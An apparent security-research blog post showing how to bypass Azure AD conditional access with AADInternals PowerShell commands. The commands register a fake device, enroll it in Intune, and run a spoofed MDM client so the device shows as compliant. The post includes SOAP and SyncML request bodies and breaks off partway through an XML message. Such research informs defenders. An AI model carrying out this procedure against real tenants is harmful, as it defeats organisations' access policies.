<!DOCTYPE html>
<html lang="en-gb">
<head>
<meta charset="UTF-8">
<meta http-equiv="cache-control" content="no-cache"> 
<meta http-equiv="expires" content="0"> 
<meta http-equiv="pragma" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Bypassing conditional access by faking device compliance.</title>
<meta name="description" content="The site for Microsoft 365 and Azure AD administrators">
<meta name="generator" content="Hugo 0.39" />
<meta property="og:title" content="Bypassing conditional access by faking device compliance." />
<meta property="og:description" content="In my previous blog I demonstrated how to create
a Persistent Refresh Token (PRT) by joining imaginary device to Azure AD.

In this blog, with AADInternals v0.4.2, I&rsquo;ll show how to make those devices compliant, allowing bypassing compliance related conditional access (CA) policies.

" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://o365blog.com/post/mdm/" />



<meta property="article:published_time" content="2020-09-06T00:00:00&#43;00:00"/>

<meta property="article:modified_time" content="2020-09-29T00:00:00&#43;00:00"/>











<link rel="dns-prefetch" href="//fonts.googleapis.com" />
<link rel="dns-prefetch" href="//fonts.gstatic.com" />

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,700" type="text/css" media="all" />
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet">
<link rel="stylesheet" href="/css/style.css" type="text/css" media="all" />
<script type="text/javascript" src="/js/scripts.js"></script>
<script type="text/javascript" src="/js/tools.js"></script>

<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/images/apple-touch-icon-57x57.png" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/images/apple-touch-icon-114x114.png" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/images/apple-touch-icon-72x72.png" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/images/apple-touch-icon-144x144.png" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/images/apple-touch-icon-60x60.png" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/images/apple-touch-icon-120x120.png" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/images/apple-touch-icon-76x76.png" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/images/apple-touch-icon-152x152.png" />
<link rel="icon" type="image/png" href="/images/favicon-196x196.png" sizes="196x196" />
<link rel="icon" type="image/png" href="/images/favicon-96x96.png" sizes="96x96" />
<link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32" />
<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16" />
<link rel="icon" type="image/png" href="/images/favicon-128.png" sizes="128x128" />
<meta name="application-name" content="&nbsp;"/>
<meta name="msapplication-TileColor" content="#FFFFFF" />
<meta name="msapplication-TileImage" content="/images/mstile-144x144.png" />
<meta name="msapplication-square70x70logo" content="/images/mstile-70x70.png" />
<meta name="msapplication-square150x150logo" content="/images/mstile-150x150.png" />
<meta name="msapplication-wide310x150logo" content="/images/mstile-310x150.png" />
<meta name="msapplication-square310x310logo" content="/images/mstile-310x310.png" />


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-61454000-4', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>

</head>
<body class="body body-right-sidebar mobile" itemscope="itemscope" itemtype="http://schema.org/WebPage">
	<div class="container container-outer">
		<header class="header" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
		
			<div class="container container-inner clearfix">
			
				<div class="logo" role="banner" itemscope="itemscope" itemtype="http://schema.org/Brand">
				
					<a class="logo__link" href="/" title="Office 365 blog" rel="home">
						<img src="/images/favicon-96x96.png"><h1 class="logo__title">Office 365 blog</h1>
						<h2 class="logo__tagline">Everything about Microsoft 365 security</h2>
					</a>
				</div>
			</div>
			
<nav class="menu" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<ul class="menu__list">
		<li class="menu__item "><a class="menu__link" href="/aadkillchain/">AAD &amp; M365 KILL CHAIN</a></li>
		<li class="menu__item "><a class="menu__link" href="/aadinternals/">AAD INTERNALS</a></li>
		<li class="menu__item "><a class="menu__link" href="/links/">LINKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/powershell/">POWERSHELL</a></li>
		<li class="menu__item "><a class="menu__link" href="/talks/">TALKS</a></li>
		<li class="menu__item "><a class="menu__link" href="/tools/">TOOLS</a></li>
	</ul>
</nav>

		</header>
		<div class="wrapper clearfix">

<main class="main-content content" role="main" itemprop="mainContentOfPage">
	<article class="post">
		<header class="post__header clearfix">
			<h1 class="post__title">Bypassing conditional access by faking device compliance.</h1>
			<p class="post__meta meta">
				<svg class="icon icon-time" height="14" viewBox="0 0 16 16" width="14" xmlns="http://www.w3.org/2000/svg"><path d="m8-.0000003c-4.4 0-8 3.6-8 8 0 4.4000003 3.6 8.0000003 8 8.0000003 4.4 0 8-3.6 8-8.0000003 0-4.4-3.6-8-8-8zm0 14.4000003c-3.52 0-6.4-2.88-6.4-6.4000003 0-3.52 2.88-6.4 6.4-6.4 3.52 0 6.4 2.88 6.4 6.4 0 3.5200003-2.88 6.4000003-6.4 6.4000003zm.4-10.4000003h-1.2v4.8l4.16 2.5600003.64-1.04-3.6-2.1600003z"/></svg>
				<time class="post__meta-date" datetime="2020-09-06T00:00:00">September 06, 2020</time>
					<time class="post__meta-lastmod" datetime="2020-09-29T00:00:00"> (Last Modified: September 29, 2020)</time>
				<span class="post__meta-categories meta-categories">
					<svg class="icon icon-category" height="16" viewBox="0 0 16 16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="m7 2l1 2h8v11h-16v-13z"/></svg>
					<a class="meta-categories__link" href="/categories/blog" rel="category">blog</a></span>
			</p>
			<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fmdm%2f&text=Bypassing%20conditional%20access%20by%20faking%20device%20compliance.&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fmdm%2f&mini=true&title=Bypassing%20conditional%20access%20by%20faking%20device%20compliance.&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
		</header>
		<div class="post__content clearfix">
			<figure class="post__thumbnail">
				<img src="/images/posts/MDM.png" alt="Bypassing conditional access by faking device compliance.">
			</figure>
				<nav id="TableOfContents">
<ul>
<li><a href="#what-is-conditional-access-ca">What is Conditional Access (CA)</a></li>
<li><a href="#how-is-the-device-marked-as-compliant">How is the device marked as compliant?</a></li>
<li><a href="#making-your-device-compliant">Making your device compliant</a>
<ul>
<li><a href="#registering-device-to-azure-ad">Registering device to Azure AD</a></li>
<li><a href="#marking-device-compliant-option-1-registering-device-to-intune">Marking device compliant - option 1: Registering device to Intune</a></li>
<li><a href="#marking-device-compliant-option-2-aad-graph-api">Marking device compliant - option 2: AAD Graph API</a></li>
</ul></li>
<li><a href="#summary">Summary</a></li>
<li><a href="#references">References</a></li>
</ul>
</nav>
			<p>In my previous <a href="/post/prt/#creating-your-own-prt" target="_blank">blog</a> I demonstrated how to create
a Persistent Refresh Token (PRT) by joining imaginary device to Azure AD.</p>

<p>In this blog, with <strong>AADInternals v0.4.2</strong>, I&rsquo;ll show how to make those devices compliant, allowing bypassing compliance related conditional access (CA) policies.</p>

<p></p>

<h1 id="what-is-conditional-access-ca">What is Conditional Access (CA)</h1>

<p>When using cloud services, the security perimeter extends beyond the traditional on-prem network, as users can consume the services anywhere they have access to internet.
As such, organisations are not anymore able to protect their services with traditional methods like firewalls.</p>

<p>However, when users are consuming services such as Office 365, Azure AD receives certains &ldquo;signals&rdquo; about the user. These signals are related to the user, user&rsquo;s device, location, etc.</p>

<p>According to the <a href="https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview" target="_blank">documentation</a>:</p>

<blockquote>
<p>Conditional Access is the tool used by Azure Active Directory to bring signals together, to make decisions, and enforce organizational policies. Conditional Access is at the heart of the new identity driven control plane.</p>
</blockquote>

<p>The following picture from the same documentation explains the process quite well. Based on the signals, we can configure the Azure AD to allow or deny access to services.</p>

<p><img src="/images/posts/conditional-access-overview-how-it-works.png" alt="Conditional Access" /></p>

<p>One of the typical scenarios is to <strong>grant access</strong> if the <strong>device</strong> used to access the service <strong>is marked as compliant</strong>.</p>

<h1 id="how-is-the-device-marked-as-compliant">How is the device marked as compliant?</h1>

<p>The device is marked as compliant when it is enrolled to Microsoft <a href="https://docs.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune" target="_blank">Intune</a>, which is
Microsoft&rsquo;s cloud-based Mobile Device Management (MDM) and Mobile Application Management (MAM) service, and it fulfills the requirements of the defined policies.
Intune is part <a href="https://www.microsoft.com/microsoft-365/enterprise-mobility-security" target="_blank">Enterprise Mobility + Security (EMS) suite</a>, which means more :dollar: to be spent.</p>

<p>When the device is enrolled to Intune, the device gets a certificate to be used to communicate with Intune. This means that the certificate is the only authentication method used to identify the device.
After enrollment, the device &ldquo;calls back&rdquo; to Intune to receive policies and to send information about its state. Intune uses <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mdm/33769a92-ac31-47ef-ae7b-dc8501f7104f" target="_blank">MDM</a> and <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mde2/4d7eadd5-3951-4f1c-8159-c39e07cbe692" target="_blank">MDM 2</a> protocols.</p>

<p>Technically, according to Microsoft <a href="https://docs.microsoft.com/en-us/windows/client-management/mdm/azure-active-directory-integration-with-mdm#use-azure-ad-graph-api" target="_blank">documentation</a>,
the <strong>MDM client</strong> uses AAD Graph API to report to Azure AD the compliance status.</p>

<h1 id="making-your-device-compliant">Making your device compliant</h1>

<h2 id="registering-device-to-azure-ad">Registering device to Azure AD</h2>

<p>In the previous <a href="/post/prt/#creating-your-own-prt" target="_blank">blog</a> we joined an imaginary device to Azure AD. Let&rsquo;s go this time a bit further and make the device compliant!</p>

<p>Let&rsquo;s start by getting an access token for joining our device to Azure AD.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get an access token for AAD join and save to cache</span>
<span class="nb">Get-AADIntAccessTokenForAADJoin</span> <span class="n">-SaveToCache</span></code></pre></div></p>

<p>Now we can join our Commodore 64 to Azure AD!</p>

<p><strong>Note!</strong> In the Azure AD, the device information such as name and OS version are only informative.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Join the device to Azure AD</span>
<span class="nb">Join-AADIntDeviceToAzureAD</span> <span class="n">-DeviceName</span> <span class="s2">&#34;SixByFour&#34;</span> <span class="n">-DeviceType</span> <span class="s2">&#34;Commodore&#34;</span> <span class="n">-OSVersion</span> <span class="s2">&#34;C64&#34;</span></code></pre></div>
Output should be similar to below. The device is now registered to Azure AD and the corresponding certificate
is saved to the current directory.</p>

<pre><code>Device successfully registered to Azure AD:
  DisplayName:     &quot;SixByFour&quot;
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
  Cert file name : &quot;d03994c9-24f8-41ba-a156-1805998d6dc7.pfx&quot;
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013
</code></pre>

<p>Now the device is available at Azure AD devices. But, as we can be see, it is not marked as compliant (yet).</p>

<p><img src="/images/posts/MDM_1.png" alt="Azure AD Devices" /></p>

<h2 id="marking-device-compliant-option-1-registering-device-to-intune">Marking device compliant - option 1: Registering device to Intune</h2>

<p>The first option to make the device compliant is to enroll it to MDM and <strong>hope that there are no policies assigned</strong>.</p>

<p>So, next we need an access token for Intune MDM. This token <strong>must</strong> have the deviceId claim, so we are using the device certificate to get one (we could also use the PRTToken).</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get an access token for Intune MDM and save to cache (prompts for credentials)</span>
<span class="nb">Get-AADIntAccessTokenForIntuneMDM</span> <span class="n">-PfxFileName</span> <span class="p">.\</span><span class="n">d03994c9</span><span class="p">-</span><span class="n">24f8</span><span class="p">-</span><span class="n">41ba-a156</span><span class="p">-</span><span class="n">1805998d6dc7</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-SaveToCache</span> </code></pre></div>

<p>Now that we have the access token, we can enroll the device to Intune:</p>

<p><div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Join the device to Intune</span>
<span class="nb">Join-AADIntDeviceToIntune</span> <span class="n">-DeviceName</span> <span class="s2">&#34;SixByFour&#34;</span></code></pre></div>
Output should be similar to below. The device is now enrolled to intune and the corresponding certificate
is saved to the current directory.</p>

<pre><code>Intune client certificate successfully created:
  Subject:         &quot;CN=d0d8b466-a652-4534-b7d8-54b4b436358c&quot;
  Issuer:          &quot;CN=Microsoft Intune MDM Device CA&quot;
  Cert thumbprint: 475F772DC6C25E9FA0084D1F2B176883860408EE
  Cert file name:  &quot;987b97c4-edf4-4e2f-9194-1205685de792-MDM.pfx&quot;
  CA file name :   &quot;987b97c4-edf4-4e2f-9194-1205685de792-MDM-CA.der&quot;
  IntMedCA file :  &quot;987b97c4-edf4-4e2f-9194-1205685de792-MDM-INTMED-CA.der&quot;
</code></pre>

<p>The whole process is as follows.</p>

<ol>
<li>A new RSA key pair is generated for the device.</li>
<li>A certificate signing request (CSR) is generated for the device with CN=<deviceId>.</li>
<li>A http request is made to &ldquo;<a href="https://fef.&lt;server&gt;.manage.microsoft.com/StatelessEnrollmentService/DeviceEnrollment.svc?client-request-id=&lt;requestId&gt;&quot;">https://fef.&lt;server&gt;.manage.microsoft.com/StatelessEnrollmentService/DeviceEnrollment.svc?client-request-id=&lt;requestId&gt;&quot;</a> to register the device to Intune MDM</li>
</ol>

<p>The request body sent to Intune:
<div class="highlight"><pre class="chroma"><code class="language-xml" data-lang="xml"><span class="nt">&lt;s:Envelope</span> <span class="na">xmlns:s=</span><span class="s">&#34;http://www.w3.org/2003/05/soap-envelope&#34;</span> <span class="na">xmlns:a=</span><span class="s">&#34;http://www.w3.org/2005/08/addressing&#34;</span> <span class="na">xmlns:u=</span><span class="s">&#34;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&#34;</span> <span class="na">xmlns:wsse=</span><span class="s">&#34;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&#34;</span> <span class="na">xmlns:wst=</span><span class="s">&#34;http://docs.oasis-open.org/ws-sx/ws-trust/200512&#34;</span> <span class="na">xmlns:ac=</span><span class="s">&#34;http://schemas.xmlsoap.org/ws/2006/12/authorization&#34;</span><span class="nt">&gt;</span>
	<span class="nt">&lt;s:Header&gt;</span>
		<span class="nt">&lt;a:Action</span> <span class="na">s:mustUnderstand=</span><span class="s">&#34;1&#34;</span><span class="nt">&gt;</span>http://schemas.microsoft.com/windows/pki/2009/01/enrollment/RST/wstep<span class="nt">&lt;/a:Action&gt;</span>
		<span class="nt">&lt;a:MessageID&gt;</span>urn:uuid:0d5a1441-5891-453b-becf-a2e5f6ea3749<span class="nt">&lt;/a:MessageID&gt;</span>
		<span class="nt">&lt;a:ReplyTo&gt;</span>
			<span class="nt">&lt;a:Address&gt;</span>http://www.w3.org/2005/08/addressing/anonymous<span class="nt">&lt;/a:Address&gt;</span>
		<span class="nt">&lt;/a:ReplyTo&gt;</span>
		<span class="nt">&lt;a:To</span> <span class="na">s:mustUnderstand=</span><span class="s">&#34;1&#34;</span><span class="nt">&gt;</span><span class="c">&lt;!--enrollment service url--&gt;</span><span class="nt">&lt;/a:To&gt;</span>
		<span class="nt">&lt;wsse:Security</span> <span class="na">s:mustUnderstand=</span><span class="s">&#34;1&#34;</span><span class="nt">&gt;</span>
			<span class="nt">&lt;wsse:BinarySecurityToken</span> <span class="na">ValueType=</span><span class="s">&#34;urn:ietf:params:oauth:token-type:jwt&#34;</span> <span class="na">EncodingType=</span><span class="s">&#34;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd#base64binary&#34;</span><span class="nt">&gt;</span><span class="c">&lt;!--B64 encoded access token--&gt;</span><span class="nt">&lt;/wsse:BinarySecurityToken&gt;</span>
		<span class="nt">&lt;/wsse:Security&gt;</span>
	<span class="nt">&lt;/s:Header&gt;</span>
	<span class="nt">&lt;s:Body&gt;</span>
		<span class="nt">&lt;wst:RequestSecurityToken&gt;</span>
			<span class="nt">&lt;wst:TokenType&gt;</span>http://schemas.microsoft.com/5.0.0.0/ConfigurationManager/Enrollment/DeviceEnrollmentToken<span class="nt">&lt;/wst:TokenType&gt;</span>
			<span class="nt">&lt;wst:RequestType&gt;</span>http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue<span class="nt">&lt;/wst:RequestType&gt;</span>
			<span class="nt">&lt;wsse:BinarySecurityToken</span> <span class="na">ValueType=</span><span class="s">&#34;http://schemas.microsoft.com/windows/pki/2009/01/enrollment#PKCS10&#34;</span> <span class="na">EncodingType=</span><span class="s">&#34;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd#base64binary&#34;</span><span class="nt">&gt;</span><span class="c">&lt;!--B64 encoded CSR--&gt;</span><span class="nt">&lt;/wsse:BinarySecurityToken&gt;</span>
			<span class="nt">&lt;ac:AdditionalContext</span> <span class="na">xmlns=</span><span class="s">&#34;http://schemas.xmlsoap.org/ws/2006/12/authorization&#34;</span><span class="nt">&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;UXInitiated&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>true<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;HWDevID&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span><span class="c">&lt;!--64 char hardware ID--&gt;</span><span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;Locale&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>en-US<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;TargetedUserLoggedIn&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>true<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;EnrollmentData&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;OSEdition&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>4<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;DeviceName&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span><span class="c">&lt;!--device name--&gt;</span><span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;MAC&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>00-00-00-00-00-00<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;DeviceID&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span><span class="c">&lt;!--device id--&gt;</span><span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;EnrollmentType&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>Device<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;DeviceType&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>CIMClient_Windows<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;OSVersion&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>10.0.18363.0<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
				<span class="nt">&lt;ac:ContextItem</span> <span class="na">Name=</span><span class="s">&#34;ApplicationVersion&#34;</span><span class="nt">&gt;</span>
					<span class="nt">&lt;ac:Value&gt;</span>10.0.18363.0<span class="nt">&lt;/ac:Value&gt;</span>
				<span class="nt">&lt;/ac:ContextItem&gt;</span>
			<span class="nt">&lt;/ac:AdditionalContext&gt;</span>
		<span class="nt">&lt;/wst:RequestSecurityToken&gt;</span>
	<span class="nt">&lt;/s:Body&gt;</span>
<span class="nt">&lt;/s:Envelope&gt;</span></code></pre></div></p>

<p>Now the device is marked as compliant in Azure AD!</p>

<p><img src="/images/posts/MDM_2.png" alt="Azure AD Devices" /></p>

<p>The same device in Intune portal seems a bit different though:</p>

<p><img src="/images/posts/MDM_3.png" alt="IntuneDevices" /></p>

<p>The name of the device is the default name given by Intune, its ownership state is unknown and the device type is Windows (not Commodore). This is because the in Intune the values
are not only informative and Intune supports only Windows, iOS and Android devices.</p>

<p>We can also see that the device has not checked in at all. So, why is it marked as compliant then? According to <a href="https://docs.microsoft.com/en-us/mem/intune/protect/device-compliance-get-started" target="_blank">documentation</a>,
by default, the compliance status validity period is 30 days. And, as in my demo tenant, there are no compliance policies set for Windows devices so there is nothing to assess.</p>

<p>Anyways, we are not done yet, as we want to set the device name to be same than in Azure AD (SixByFour). As I mentioned earlier, clients are communicating with Intune using MDM protocol,
which utilises <a href="https://docs.microsoft.com/en-us/windows/client-management/mdm/oma-dm-protocol-support" target="_blank">SyncML</a>. SyncML is an xml based language used to synchronise information between two parties.</p>

<p>I was able see the traffic between a Windows 10 VM and Intune with Fiddler by using the MDM certificate for client authentication. However, the content-type used was <strong>application/vnd.syncml.dm+wbxml</strong> which means that the
content was binary xml. Luckily, I had already implemented wbxml support to AADInternasl for Exchange Active Sync so all I had to do was to add new code page. After figuring out the startup
message, I was ready to implement my own Intune &ldquo;client&rdquo;.</p>

<p>I noticed that Intune should also support non-binary xml, so tried to change the content-type to <strong>application/vnd.syncml.dm+xml</strong> and it worked like a charm! This made debugging a much easier job.</p>

<p>I created the Intune client so that by default it answers to all GET commands with an error code 400 (Bad request) and to all SET, ADD, RESET, and DELETE commands with 200 (All okay). For certain GET commands, like the device name, the
client answers with 200 using predefined values.</p>

<p><strong>Note!</strong> In theory, it would be possible to give back all the right answers that would fulfill any compliance requirement.</p>

<p>So, let&rsquo;s start the call back process (use the -Verbose switch to see what is happening):
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Start the call back</span>
<span class="nb">Start-AADIntDeviceIntuneCallback</span> <span class="n">-PfxFileName</span> <span class="p">.\</span><span class="n">d03994c9</span><span class="p">-</span><span class="n">24f8</span><span class="p">-</span><span class="n">41ba-a156</span><span class="p">-</span><span class="n">1805998d6dc7-MDM</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-DeviceName</span> <span class="s2">&#34;SixByFour&#34;</span></code></pre></div></p>

<p>And now the device name is correct also in Intune and we can even see the check-in time:</p>

<p><img src="/images/posts/MDM_4.png" alt="IntuneDevices" /></p>

<p>Below we can see the initial SyncML request that starts the call back &ldquo;discussion&rdquo;:
<div class="highlight"><pre class="chroma"><code class="language-xml" data-lang="xml"><span class="nt">&lt;SyncML&gt;</span>
	<span class="nt">&lt;SyncHdr&gt;</span>
		<span class="nt">&lt;VerDTD&gt;</span>1.2<span class="nt">&lt;/VerDTD&gt;</span>
		<span class="nt">&lt;VerProto&gt;</span>DM/1.2<span class="nt">&lt;/VerProto&gt;</span>
		<span class="nt">&lt;SessionID&gt;</span>1<span class="nt">&lt;/SessionID&gt;</span>
		<span class="nt">&lt;MsgID&gt;</span>1<span class="nt">&lt;/MsgID&gt;</span>
		<span class="nt">&lt;Target&gt;</span>
			<span class="nt">&lt;LocURI&gt;</span>https://r.manage.microsoft.com/devicegatewayproxy/cimhandler.ashx<span class="nt">&lt;/LocURI&gt;</span>
		<span class="nt">&lt;/Target&gt;</span>
		<span class="nt">&lt;Source&gt;</span>
			<span class="nt">&lt;LocURI&gt;</span>SixByFour<span class="nt">&lt;/LocURI&gt;</span>
		<span class="nt">&lt;/Source&gt;</span>
	<span class="nt">&lt;/SyncHdr&gt;</span>
	<span class="nt">&lt;SyncBody&gt;</span>
		<span class="nt">&lt;Alert&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>1<span class="nt">&lt;/CmdID&gt;</span>
			<span class="nt">&lt;Data&gt;</span>1201<span class="nt">&lt;/Data&gt;</span>
		<span class="nt">&lt;/Alert&gt;</span>
		<span class="nt">&lt;Replace&gt;</span>
			<span class="nt">&lt;CmdID&gt;</span>2<span class="nt">&lt;/CmdID&gt;</span>            
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Source&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevInfo/Mod<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Source&gt;</span>
				<span class="nt">&lt;Data&gt;</span>Virtual Machine<span class="nt">&lt;/Data&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>            
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Source&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevInfo/DevId<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Source&gt;</span>
				<span class="nt">&lt;Data&gt;</span>SixByFour<span class="nt">&lt;/Data&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>            
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Source&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevInfo/Man<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Source&gt;</span>
				<span class="nt">&lt;Data&gt;</span>Microsoft Corporation<span class="nt">&lt;/Data&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>            
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Source&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevInfo/Lang<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Source&gt;</span>
				<span class="nt">&lt;Data&gt;</span>en-US<span class="nt">&lt;/Data&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>            
			<span class="nt">&lt;Item&gt;</span>
				<span class="nt">&lt;Source&gt;</span>
					<span class="nt">&lt;LocURI&gt;</span>./DevInfo/DmV<span class="nt">&lt;/LocURI&gt;</span>
				<span class="nt">&lt;/Source&gt;</span>
				<span class="nt">&lt;Data&gt;</span>1.3<span class="nt">&lt;/Data&gt;</span>
			<span class="nt">&lt;/Item&gt;</span>
        <span class="nt">&lt;/Replace&gt;</span>
		<span class="nt">&lt;Final/&gt;</span>
	<span class="nt">&lt;/SyncBody&gt;</span>
<span class="nt">&lt;/SyncML&gt;</span></code></pre></div></p>

<p>Intune responses by saying that the request was okay (SyncHdr command = 200). Then it asks the values (GET) for certain settings.
<div class="highlight"><pre class="chroma"><code class="language-xml" data-lang="xml"><span class="cp">&lt;?xml version=&#34;1.0&#34; encoding=&#34;utf-8&#34;?&gt;</span>
<span class="nt">&lt;SyncML</span> <span class="na">xmlns=</span><span class="s">&#34;SYNCML:SYNCML1.2&#34;</span><span class="nt">&gt;</span>
	<span class="nt">&lt;SyncHdr&gt;</span>
		<span class="nt">&lt;VerDTD&gt;</span>1.2<span class="nt">&lt;/VerDTD&gt;</span>
		<span class="nt">&lt;VerProto&gt;</span>DM/1.2<span class="nt">&lt;/VerProto&gt;</span>
		<span class="nt">&lt;SessionID&gt;</span>1<span class="nt">&lt;/SessionID&gt;</span>
		<span class="nt">&lt;MsgID&gt;</span>1<span class="nt">&lt;/MsgID&gt;</span>
		<span class="nt">&lt;Target&gt;</span>
			<span class="nt">&lt;LocURI&gt;</span>SixByFour<span class="nt">&lt;/LocURI&gt;</span>
		<span class="nt">&lt;/Target&gt;</span>
		<span class="nt">&lt;Source&gt;</span>
			<span class="nt">&lt;LocURI&gt;</span>https://r.manage.microsoft.com/devicegatewayproxy/cimhandler.ashx<span class="nt">&lt;/LocURI&gt;</span>
